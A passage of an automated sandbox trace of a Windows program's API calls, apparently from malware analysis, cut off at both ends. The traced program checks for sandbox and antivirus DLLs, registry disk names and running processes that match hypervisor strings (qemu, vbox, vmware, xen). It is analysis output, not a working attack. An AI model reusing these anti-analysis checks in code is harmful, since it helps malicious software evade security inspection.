(_Str="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", _SubStr="7869.vmt") returned 0x0 [0155.617] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ff54, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ff54, ResultLength=0x0) returned 0x0 [0155.618] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ff5c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ff5c, ReturnLength=0x0) returned 0x0 [0155.618] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0155.618] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0155.618] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0155.618] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414768 [0155.618] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0155.618] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0155.618] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0155.618] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0155.618] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414878 [0155.618] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414878, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414878, ResultLength=0x18ff50) returned 0x0 [0155.618] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0155.619] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0155.619] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0155.620] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="qemu") returned 0x0 [0155.620] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="virtio") returned 0x0 [0155.620] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vmware") returned 0x0 [0155.620] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vbox") returned 0x0 [0155.620] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="xen") returned 0x0 [0155.620] LocalFree (hMem=0x4148b0) returned 0x0 [0155.620] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0155.620] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0155.621] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0155.622] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="qemu") returned 0x0 [0155.622] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="virtio") returned 0x0 [0155.622] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vmware") returned 0x0 [0155.622] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vbox") returned 0x0 [0155.622] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="xen") returned 0x0 [0155.622] LocalFree (hMem=0x4148b0) returned 0x0 [0155.622] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0155.622] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0155.622] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0155.623] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="qemu") returned 0x0 [0155.623] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="virtio") returned 0x0 [0155.623] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vmware") returned 0x0 [0155.623] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vbox") returned 0x0 [0155.623] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="xen") returned 0x0 [0155.624] LocalFree (hMem=0x4148b0) returned 0x0 [0155.624] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0155.624] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0155.624] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0155.625] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="qemu") returned 0x0 [0155.625] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="virtio") returned 0x0 [0155.625] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vmware") returned 0x0 [0155.625] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vbox") returned 0x0 [0155.625] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="xen") returned 0x0 [0155.626] LocalFree (hMem=0x4148b0) returned 0x0 [0155.626] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0155.626] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x4148b0 [0155.626] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7a, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0155.627] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="qemu") returned 0x0 [0155.627] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="virtio") returned 0x0 [0155.627] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vmware") returned 0x0 [0155.627] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vbox") returned 0x0 [0155.627] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="xen") returned 0x0 [0155.627] LocalFree (hMem=0x4148b0) returned 0x0 [0155.627] LocalFree (hMem=0x414878) returned 0x0 [0155.628] NtClose (Handle=0x80) returned 0x0 [0155.628] LocalFree (hMem=0x414768) returned 0x0 [0155.628] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414768 [0155.628] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0155.628] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0155.628] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0155.628] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0155.628] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414878 [0155.628] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414878, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414878, ResultLength=0x18ff50) returned 0x0 [0155.628] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0155.629] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x4148b0 [0155.629] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x50, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0155.629] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="qemu") returned 0x0 [0155.629] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="virtio") returned 0x0 [0155.629] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vmware") returned 0x0 [0155.629] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vbox") returned 0x0 [0155.629] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="xen") returned 0x0 [0155.629] LocalFree (hMem=0x4148b0) returned 0x0 [0155.629] LocalFree (hMem=0x414878) returned 0x0 [0155.629] NtClose (Handle=0x80) returned 0x0 [0155.630] LocalFree (hMem=0x414768) returned 0x0 [0155.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0x102b8) returned 0xc0000004 [0155.630] LocalAlloc (uFlags=0x40, uBytes=0x112b8) returned 0x4149b0 [0155.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4149b0, Length=0x112b8, ResultLength=0x18ff5c | out: SystemInformation=0x4149b0, ResultLength=0x18ff5c*=0xc950) returned 0x0 [0155.633] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0155.633] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0155.633] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0155.633] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0155.633] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0155.633] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0155.633] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0155.633] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.633] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0155.633] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0155.633] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.633] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.633] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.633] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.633] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.633] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0155.633] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0155.633] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.633] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.633] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.633] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.633] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.633] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0155.634] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0155.634] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.634] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.634] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.634] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.634] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.634] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0155.634] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0155.634] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.634] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.634] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.634] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.634] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.634] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0155.634] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0155.634] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.634] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.634] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.634] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.634] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.634] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0155.634] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0155.634] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.634] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.634] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.634] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.635] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.635] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0155.635] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0155.635] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.635] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.635] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.635] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.635] wcsstr (_Str="lsm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.635] wcsstr (_Str="lsm.exe", _SubStr="qga.exe") returned 0x0 [0155.635] wcsstr (_Str="lsm.exe", _SubStr="windanr.exe") returned 0x0 [0155.635] wcsstr (_Str="lsm.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.635] wcsstr (_Str="lsm.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.635] wcsstr (_Str="lsm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.635] wcsstr (_Str="lsm.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.635] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.636] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.637] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.637] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.637] wcsstr (_Str="explorer.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.637] wcsstr (_Str="explorer.exe", _SubStr="qga.exe") returned 0x0 [0155.637] wcsstr (_Str="explorer.exe", _SubStr="windanr.exe") returned 0x0 [0155.637] wcsstr (_Str="explorer.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.637] wcsstr (_Str="explorer.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.637] wcsstr (_Str="explorer.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.637] wcsstr (_Str="explorer.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.637] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.637] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0155.637] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0155.637] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.637] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.637] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.637] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.637] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.637] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0155.637] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0155.637] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.637] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.637] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.637] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.637] wcsstr (_Str="spoolsv.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.637] wcsstr (_Str="spoolsv.exe", _SubStr="qga.exe") returned 0x0 [0155.638] wcsstr (_Str="spoolsv.exe", _SubStr="windanr.exe") returned 0x0 [0155.638] wcsstr (_Str="spoolsv.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.638] wcsstr (_Str="spoolsv.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.638] wcsstr (_Str="spoolsv.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.638] wcsstr (_Str="spoolsv.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.638] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.638] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0155.638] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0155.638] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.638] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.638] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.638] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.638] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.638] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0155.638] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0155.638] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.638] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.638] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.638] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.638] wcsstr (_Str="officeclicktorun.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.638] wcsstr (_Str="officeclicktorun.exe", _SubStr="qga.exe") returned 0x0 [0155.638] wcsstr (_Str="officeclicktorun.exe", _SubStr="windanr.exe") returned 0x0 [0155.638] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.638] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.638] wcsstr (_Str="officeclicktorun.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.638] wcsstr (_Str="officeclicktorun.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.639] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.639] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0155.639] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0155.639] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.639] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.639] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.639] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.639] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.639] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0155.639] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0155.639] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.639] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.639] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.639] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.639] wcsstr (_Str="wmiprvse.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.639] wcsstr (_Str="wmiprvse.exe", _SubStr="qga.exe") returned 0x0 [0155.639] wcsstr (_Str="wmiprvse.exe", _SubStr="windanr.exe") returned 0x0 [0155.639] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.639] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.639] wcsstr (_Str="wmiprvse.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.639] wcsstr (_Str="wmiprvse.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.640] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.640] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.640] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="qga.exe") returned 0x0 [0155.640] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="windanr.exe") returned 0x0 [0155.640] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.640] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.640] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.640] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.640] wcsstr (_Str="at_effort.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.640] wcsstr (_Str="at_effort.exe", _SubStr="qga.exe") returned 0x0 [0155.640] wcsstr (_Str="at_effort.exe", _SubStr="windanr.exe") returned 0x0 [0155.640] wcsstr (_Str="at_effort.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.640] wcsstr (_Str="at_effort.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.641] wcsstr (_Str="at_effort.exe", 